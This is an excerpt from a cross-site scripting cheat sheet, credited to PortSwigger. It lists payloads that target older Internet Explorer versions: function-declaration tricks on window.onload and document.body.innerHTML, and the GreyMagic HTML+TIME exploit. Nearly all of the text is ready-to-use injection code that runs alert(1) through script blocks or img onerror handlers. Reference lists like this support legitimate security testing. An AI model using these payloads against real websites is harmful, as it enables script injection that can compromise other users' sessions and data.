Event handlers supported in functions in older versions of IE
<script> function window.onload(){ alert(1); } </script>

<script> function window::onload(){ alert(1); } </script>

<script> function window.location(){ } </script>

<body> <script> function/*<img src=http://www.likecs.com/1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>

<body> <script> function document.body.innerHTML(){ x = "<img src=http://www.likecs.com/1 onerror=alert(1)>"; } </script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=http://www.likecs.com/1 onerror=alert(1)>"> </BODY></HTML>

Original source: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet